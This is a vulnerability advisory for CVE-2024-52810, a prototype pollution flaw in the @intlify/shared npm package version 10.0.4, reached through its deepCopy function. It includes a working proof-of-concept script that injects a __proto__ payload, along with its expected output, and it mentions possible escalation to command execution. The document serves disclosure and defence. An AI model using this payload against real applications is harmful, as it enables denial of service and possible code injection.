CVE-2024-52810: @intlify/shared Prototype Pollution vulnerability
Vulnerability type: Prototype Pollution
Affected Package:
Product: @intlify/shared Version: 10.0.4
Vulnerability Location(s):
node_modules/@intlify/shared/dist/shared.cjs:232:26
Description:
The latest version of @intlify/shared (10.0.4)
is vulnerable to Prototype Pollution through the entry function(s) lib.deepCopy
. An attacker can supply a payload with Object.prototype
setter to introduce or modify properties within the global prototype chain, causing denial of service (DoS) the minimum consequence.
Moreover, the consequences of this vulnerability can escalate to other injection-based attacks, depending on how the library integrates within the application. For instance, if the polluted property propagates to sensitive Node.js APIs (e.g., exec, eval), it could enable an attacker to execute arbitrary commands within the application’s context.
PoC:
// install the package with the latest version
~$ npm install @intlify/shared@10.0.4
// run the script mentioned below
~$ node poc.js
//The expected output (if the code still vulnerable) is below.
// Note that the output may slightly differs from function to another.
Before Attack: {}
After Attack: {"pollutedKey":123}
(async () => {
const lib = await import('@intlify/shared');
var someObj = {}
console.log("Before Attack: ", JSON.stringify({}.__proto__));
try {
// for multiple functions, uncomment only one for each execution.
lib.deepCopy (JSON.parse('{"__proto__":{"pollutedKey":123}}'), someObj)
} catch (e) { }
console.log("After Attack: ", JSON.stringify({}.__proto__));
delete Object.prototype.pollutedKey;
})();
References
Prototype Pollution Leading to Remote Code Execution - An example of how prototype pollution can lead to command code injection.
References
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